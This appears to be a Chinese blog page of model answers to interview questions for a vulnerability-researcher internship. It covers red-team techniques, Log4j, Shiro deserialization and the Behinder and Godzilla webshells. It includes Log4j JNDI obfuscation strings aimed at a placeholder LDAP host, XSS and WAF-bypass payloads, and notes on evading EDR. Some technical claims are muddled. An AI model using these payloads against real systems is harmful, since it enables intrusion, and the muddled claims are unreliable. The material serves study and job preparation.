当前位置: 首页 > news >正文

2025年渗透测试面试题总结- 深某服-漏洞研究员实习(题目+回答)

   网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 深信服-漏洞研究员实习

1. 在XX实习时做了什么

2. 渗透测试的思路简单描述

3. 护网中承担什么角色

4. 红队一些攻击思路

5. 拿下系统如何横向

6. Log4j漏洞(CVE-2021-44228)研究

7. 内存码(Shellcode Loader)了解

8. 冰蝎、哥斯拉工具分析

9. 攻击队研究重点

10. 擅长漏洞/攻击方向

11. Shiro反序列化漏洞解析

12. Bypass方法示例


 深某服-漏洞研究员实习

在XX实习时做了什么渗透测试的思路简单描述护网中承担什么角色红队一些攻击思路拿下系统如何横向前段时间的那个log4j有研究吗,可以简单说一下吗(接上)有哪些混淆绕过的方法内存码有没有了解冰蝎、哥斯拉这些工具有没有了解过做攻击队的时候有没有研究过什么攻击,比如研究一些工具还是魔改什么的那么多漏洞和攻击,比较擅长哪一个说下shiro反序列化的形成原因、利用链对一些bypass的方法有没有了解过,什么姿势可以简单介绍一下。

1. 在XX实习时做了什么

在实习期间,主要围绕渗透测试、漏洞挖掘和攻防实战展开:

  • 渗透测试项目:参与内/外部资产的安全评估,包括Web应用、API接口和内部系统的漏洞扫描(如SQL注入、XSS、逻辑漏洞等)。
  • 漏洞挖掘与利用:针对Java框架(Shiro、Fastjson)、中间件(WebLogic、Tomcat)进行代码审计,复现历史漏洞并尝试发现新攻击面。
  • 红蓝对抗支持:协助防守方分析攻击流量,溯源攻击链;同时模拟攻击队编写PoC工具,绕过WAF规则。
  • 报告输出:整理漏洞复现步骤、风险等级和修复方案,推动开发团队修复高危漏洞。

2. 渗透测试的思路简单描述

渗透测试核心流程分五阶段:

  1. 信息收集
    • 子域名枚举(如subfinder)、端口扫描(nmap)、指纹识别(Wappalyzer)。
    • 敏感信息泄露(GitHub源码、备份文件、配置文件)。
  2. 漏洞扫描与验证
    • 工具自动化扫描(AWVS、Nessus),结合手动验证误报(如逻辑漏洞、未授权访问)。
  3. 权限提升
    • 通过弱口令、反序列化、文件上传等漏洞获取初始立足点。
  4. 横向移动
    • 利用内网协议(SMB、WinRM)、凭证窃取(Mimikatz)扩大控制范围。
  5. 报告输出
    • 输出漏洞详情、攻击路径图及修复建议。

3. 护网中承担什么角色

  • 攻击队角色
    • 突破入口:针对暴露面(Web应用、VPN、邮件系统)进行漏洞利用(如Log4j、OA系统RCE)。
    • 横向渗透:通过内网代理(如reGeorg)和口令爆破(Hydra)拿下域控或核心数据库。
  • 防守经验
    • 分析攻击流量特征(如冰蝎流量加密),优化WAF规则;
    • 协助处置应急事件(如Webshell查杀、日志溯源)。

4. 红队一些攻击思路

初始入侵阶段

  • 鱼叉攻击:钓鱼邮件投递恶意文档(CVE-2021-40444)或伪装升级包(供应链污染)。
  • 0day/Nday利用:针对未修复的高危漏洞快速突破(如Confluence RCE)。

横向扩展阶段

  • 凭证窃取:通过Mimikatz提取内存密码、Kerberoasting攻击获取服务账户哈希。
  • 权限维持:部署隐蔽后门(如计划任务、WMI事件订阅)、黄金票据伪造域管权限。

5. 拿下系统如何横向

横向移动关键步骤:

  1. 信息收集
    • 内网资产扫描(Netsparker、Fscan),定位高价值目标(数据库、域控)。
  2. 凭证利用
    • Pass-the-Hash(NTLM哈希传递)、Pass-the-Ticket(Kerberos票据转发)。
  3. 协议漏洞
    • 利用SMBGhost(CVE-2020-0796)、Zerologon(CVE-2020-1472)直接提权。
  4. 隐蔽通道
    • 通过DNS隧道(dnscat2)、HTTP代理(Chisel)绕过网络隔离。

6. Log4j漏洞(CVE-2021-44228)研究

原理:Log4j 2.x版本解析日志时,未对${jndi:ldap://xxx}等表达式过滤,导致JNDI注入,远程加载恶意类触发RCE。

混淆绕过方法

  • 环境变量注入${${env:XXX:-j}ndi:ldap://xxx}(利用默认值覆盖)。
  • Lower/Upper关键字${jNdi:ldap://xxx}(大小写绕过)。
  • 嵌套表达式${${::-j}ndi:ldap://xxx}(特殊符号替换)。
  • 绕过高版本限制:利用上下文变量(如${ctx:xxx})拼接攻击载荷。

7. 内存码(Shellcode Loader)了解

  • 原理:将恶意代码(如Cobalt Strike的Beacon)直接加载到内存中执行,避免文件落地。
  • 常见技术
    • 反射型DLL注入:通过VirtualAlloc分配内存并执行。
    • 进程镂空(Process Hollowing):替换合法进程内存内容(如svchost.exe )。
  • 对抗检测:通过加密壳(如AES)、API调用混淆(如Syscall直接调用)绕过EDR。

8. 冰蝎、哥斯拉工具分析

  • 冰蝎(Behinder)
    • 特点:动态密钥加密流量(AES+随机Key),支持HTTP/HTTPS隧道。
    • 检测难点:特征为固定UA头Content-Type: application/octet-stream
  • 哥斯拉(Godzilla)
    • 优势:支持更多加密算法(如RSA)、模块化功能(内网穿透、端口扫描)。
    • 绕过技巧:修改默认密钥、自定义HTTP头字段混淆流量。

9. 攻击队研究重点

  • 工具武器化
    • 魔改C2框架(如Cobalt Strike Aggressor脚本),适配目标环境。
    • 开发轻量级漏洞利用工具(如Fastjson一键利用)。
  • 流量混淆
    • 对Webshell流量进行分段编码(如Base64+Hex混合)、添加垃圾数据。
  • 供应链攻击
    • 研究第三方组件漏洞(如npm包、Docker镜像投毒)。

10. 擅长漏洞/攻击方向

反序列化漏洞

  • 擅长点:Java反序列化链构造(如CommonsBeanutils、CC链)、内存马注入。
  • 实战案例:通过Shiro RememberMe字段反序列化打入内网,结合JNDI注入加载内存马。

11. Shiro反序列化漏洞解析

形成原因

  • Shiro使用硬编码AES密钥加密RememberMe字段,攻击者通过伪造Cookie触发反序列化。
  • 反序列化入口点:AbstractRememberMeManager#decrypt方法。

利用链(以CommonsBeanutils为例)

  1. 触发点:恶意Cookie → AES解密 → 反序列化 → 调用BeanComparator.compare()
  2. 利用链:通过PropertyUtils.getProperty() 触发任意Getter方法,最终执行TemplatesImpl加载字节码。

12. Bypass方法示例

常见绕过姿势

  • 编码混淆:URL编码、Unicode转义(如<img src=x onerror=alert(1)>\u003cimg\u0020src=x...)。
  • 关键字分割:利用注释符或拼接(如<svg/onload=alert``(1)>)。
  • 协议特性
    • HTTP参数污染(HPP):param=1&param=payload触发解析差异。
    • 特殊符号:${1+1}在Thymeleaf等模板引擎中执行表达式。

相关文章:

2025年渗透测试面试题总结- 深某服-漏洞研究员实习(题目+回答)

网络安全领域各种资源&#xff0c;学习文档&#xff0c;以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具&#xff0c;欢迎关注。 目录 深信服-漏洞研究员实习 1. 在XX实习时做了什么 2. 渗透测试的思路简单描述 3. 护网中承担什么角色 4…...

(13)Anaconda 安装配置详解

1. Anaconda 简介 Anaconda 是一个用于科学计算和数据分析的 Python 发行版,它集成了 Python 解释器、大量常用的科学计算库以及强大的包管理工具。 2. Anaconda 主要特点 丰富的库集合:包含了超过 1500 个用于科学计算、数据分析、机器学习等领域的常用 Python 库,例如 N…...

MWC 2025 | 移远通信大模型解决方案加速落地,引领服务机器人创新变革

随着人工智能、大模型等技术的蓬勃发展&#xff0c;生成式AI应用全面爆发。在此背景下&#xff0c;服务机器人作为大模型技术在端侧落地的关键场景&#xff0c;迎来了前所未有的发展机遇。 作为与用户直接交互的智能设备&#xff0c;服务机器人需要应对复杂场景下的感知、决策和…...

[内网安全] Windows 域认证 — Kerberos 协议认证

&#x1f31f;想系统化学习内网渗透&#xff1f;看看这个&#xff1a;[内网安全] 内网渗透 - 学习手册-CSDN博客 0x01&#xff1a;Kerberos 协议简介 Kerberos 是一种网络认证协议&#xff0c;其设计目标是通过密钥系统为客户机 / 服务器应用程序提供强大的认证服务。该认证过…...

[Computer Vision]实验七:图像检索

目录 一、实验内容 二、实验过程 2.1 准备数据集 2.2 SIFT特征提取 2.3 学习“视觉词典”&#xff08;vision vocabulary&#xff09; 2.4 建立图像索引并保存到数据库中 2.5 用一幅图像查询 三、实验小结 一、实验内容 实现基于颜色直方图、bag of word等方法的以图搜…...

C++之thread_local变量

C之thread_local变量_c threadlocal-CSDN博客 thread_local简介 thread_local 是 C11 为线程安全引进的变量声明符。表示对象的生命周期属于线程存储期。 线程局部存储(Thread Local Storage&#xff0c;TLS)是一种存储期(storage duration)&#xff0c;对象的存储是在…...

【国产Linux | 银河麒麟】麒麟化龙——KylinOS下载到安装一条龙服务,起飞!

&#x1f5fa;️博客地图 &#x1f4cd;一、下载地址 &#x1f4cd;二、 系统安装 本文基于Windows操作系统vmware虚拟机安装 一、下载地址 官网&#xff1a;产品试用申请国产操作系统、麒麟操作系统——麒麟软件官方网站 下载自己需要的版本&#xff0c;完成后&#xff0c…...

(接“使用js去复制网页内容的方法”)js中的execCommand怎么复制富文本内容解析

document.execCommand(copy) 是传统的剪贴板操作方法&#xff0c;但它主要用于复制纯文本内容。如果你想复制富文本内容&#xff08;包括 HTML 标签和样式&#xff09;&#xff0c;需要结合一些技巧来实现。以下是具体方法&#xff1a; 方法&#xff1a;通过创建隐藏的富文本元…...

npm ERR! code 128 npm ERR! An unknown git error occurred

【问题描述】 【问题解决】 管理员运行cmd&#xff08;右键window --> 选择终端管理员&#xff09; 执行命令 git config --global url.“https://”.insteadOf ssh://git cd 到项目目录 重新执行npm install 个人原因&#xff0c;这里执行npm install --registryhttps:…...

解决Leetcode第3470题全排列IV

3470.全排列IV 难度&#xff1a;困难 问题描述&#xff1a; 给你两个整数n和k&#xff0c;一个交替排列是前n个正整数的排列&#xff0c;且任意相邻两个元素不都为奇数或都为偶数。 返回第k个交替排列&#xff0c;并按字典序排序。如果有效的交替排列少于k个&#xff0c;则…...

MyBatis 配置文件核心

MyBatis 配置文件核心标签解析 以下是针对你的笔记中的三个核心标签的详细解析&#xff0c;帮助你全面理解它们的用途和配置逻辑。 1. properties 标签&#xff1a;动态加载外部配置 功能 将环境相关的配置&#xff08;如数据库连接、密钥等&#xff09;与 MyBatis 核心配置…...

bert模型笔记

1.各预训练模型说明 BERT模型在英文数据集上提供了两种大小的模型&#xff0c;Base和Large。Uncased是意味着输入的词都会转变成小写&#xff0c;cased是意味着输入的词会保存其大写&#xff08;在命名实体识别等项目上需要&#xff09;。Multilingual是支持多语言的&#xff0…...

微信小程序接入deepseek

先上效果 话不多说&#xff0c;直接上代码&#xff08;本人用的hbuilder Xuniapp&#xff09; <template><view class"container"><!-- 聊天内容区域 --><scroll-view class"chat-list" scroll-y :scroll-top"scrollTop":…...

推荐算法和推荐系统入门第一趴

以下是推荐系统技术总结的架构梳理和建议表达思路&#xff1a; 从原理到生产环境&#xff1a;推荐系统核心技术与实战代码解析 一、推荐算法的演进图谱 传统算法三剑客 ![推荐系统算法分类示意图] &#xff08;使用Mermaid绘制算法分类关系图&#xff0c;清晰展示技术演进&am…...

unity pico开发 四 物体交互 抓取 交互层级

文章目录 手部设置物体交互物体抓取添加抓取抓取三种类型抓取点偏移抓取事件抓取时不让物体吸附到手部 射线抓取交互层级 手部设置 为手部&#xff08;LeftHandController&#xff09;添加XRDirInteractor脚本 并添加一个球形碰撞盒&#xff0c;勾选isTrigger,调整大小为0.1 …...

基于深度学习的青花瓷图像检索系统开发与实现

目录 1.研究背景与目的 1.1课题背景 1.2研究目的 二、调研资料情况 2.1图像分割研究现状 2.2图像检索调研 2.2.1选择深度学习进行检索的原因及优势 2.2.2基于深度学习的图像检索技术的发展 2.2.3基于深度学习的图像检索的研究重点 2.3基于深度学习的图像检索方法调研 …...

uniapp 系统学习,从入门到实战(八)—— Vuex 的使用

全篇大概 4500 字(含代码)&#xff0c;建议阅读时间 30min &#x1f4da; 目录 Vuex核心概念解析在 UniApp 中集成Vuex状态管理与数据共享实践总结 一、Vuex 核心概念解析 1.1 什么是状态管理 在跨多组件的大型应用中&#xff0c;不同页面/组件需要共享和修改相同数据时&am…...

Vue Hooks 深度解析:从原理到实践

Vue Hooks 深度解析&#xff1a;从原理到实践 前些天发现了一个巨牛的人工智能学习网站&#xff0c;通俗易懂&#xff0c;风趣幽默&#xff0c;忍不住分享一下给大家&#xff01;点我试试&#xff01;&#xff01; 文章目录 Vue Hooks 深度解析&#xff1a;从原理到实践一、背景…...

django中序列化器serializer 的高级使用和需要注意的点

在 Django REST framework(DRF)中,序列化器(Serializer)是一个强大的工具,用于将复杂的数据类型(如 Django 模型实例)转换为 Python 原生数据类型,以便将其渲染为 JSON、XML 等格式,同时也能将接收到的外部数据反序列化为 Django 模型实例。以下将介绍序列化器的高级…...

靶场(二)---靶场心得小白分享

开始&#xff1a; 看一下本地IP 21有未授权访问的话&#xff0c;就从21先看起 PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 2.0.8 or later | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Cant get dire…...

基于算法竞赛的c++编程(28)结构体的进阶应用

结构体的嵌套与复杂数据组织 在C中&#xff0c;结构体可以嵌套使用&#xff0c;形成更复杂的数据结构。例如&#xff0c;可以通过嵌套结构体描述多层级数据关系&#xff1a; struct Address {string city;string street;int zipCode; };struct Employee {string name;int id;…...

深度学习在微纳光子学中的应用

深度学习在微纳光子学中的主要应用方向 深度学习与微纳光子学的结合主要集中在以下几个方向&#xff1a; 逆向设计 通过神经网络快速预测微纳结构的光学响应&#xff0c;替代传统耗时的数值模拟方法。例如设计超表面、光子晶体等结构。 特征提取与优化 从复杂的光学数据中自…...

生成xcframework

打包 XCFramework 的方法 XCFramework 是苹果推出的一种多平台二进制分发格式&#xff0c;可以包含多个架构和平台的代码。打包 XCFramework 通常用于分发库或框架。 使用 Xcode 命令行工具打包 通过 xcodebuild 命令可以打包 XCFramework。确保项目已经配置好需要支持的平台…...

智能在线客服平台:数字化时代企业连接用户的 AI 中枢

随着互联网技术的飞速发展&#xff0c;消费者期望能够随时随地与企业进行交流。在线客服平台作为连接企业与客户的重要桥梁&#xff0c;不仅优化了客户体验&#xff0c;还提升了企业的服务效率和市场竞争力。本文将探讨在线客服平台的重要性、技术进展、实际应用&#xff0c;并…...

Linux-07 ubuntu 的 chrome 启动不了

文章目录 问题原因解决步骤一、卸载旧版chrome二、重新安装chorme三、启动不了&#xff0c;报错如下四、启动不了&#xff0c;解决如下 总结 问题原因 在应用中可以看到chrome&#xff0c;但是打不开(说明&#xff1a;原来的ubuntu系统出问题了&#xff0c;这个是备用的硬盘&a…...

鱼香ros docker配置镜像报错:https://registry-1.docker.io/v2/

使用鱼香ros一件安装docker时的https://registry-1.docker.io/v2/问题 一键安装指令 wget http://fishros.com/install -O fishros && . fishros出现问题&#xff1a;docker pull 失败 网络不同&#xff0c;需要使用镜像源 按照如下步骤操作 sudo vi /etc/docker/dae…...

SpringCloudGateway 自定义局部过滤器

场景&#xff1a; 将所有请求转化为同一路径请求&#xff08;方便穿网配置&#xff09;在请求头内标识原来路径&#xff0c;然后在将请求分发给不同服务 AllToOneGatewayFilterFactory import lombok.Getter; import lombok.Setter; import lombok.extern.slf4j.Slf4j; impor…...

QT: `long long` 类型转换为 `QString` 2025.6.5

在 Qt 中&#xff0c;将 long long 类型转换为 QString 可以通过以下两种常用方法实现&#xff1a; 方法 1&#xff1a;使用 QString::number() 直接调用 QString 的静态方法 number()&#xff0c;将数值转换为字符串&#xff1a; long long value 1234567890123456789LL; …...

【笔记】WSL 中 Rust 安装与测试完整记录

#工作记录 WSL 中 Rust 安装与测试完整记录 1. 运行环境 系统&#xff1a;Ubuntu 24.04 LTS (WSL2)架构&#xff1a;x86_64 (GNU/Linux)Rust 版本&#xff1a;rustc 1.87.0 (2025-05-09)Cargo 版本&#xff1a;cargo 1.87.0 (2025-05-06) 2. 安装 Rust 2.1 使用 Rust 官方安…...

在Mathematica中实现Newton-Raphson迭代的收敛时间算法(一般三次多项式)

考察一般的三次多项式&#xff0c;以r为参数&#xff1a; p[z_, r_] : z^3 (r - 1) z - r; roots[r_] : z /. Solve[p[z, r] 0, z]&#xff1b; 此多项式的根为&#xff1a; 尽管看起来这个多项式是特殊的&#xff0c;其实一般的三次多项式都是可以通过线性变换化为这个形式…...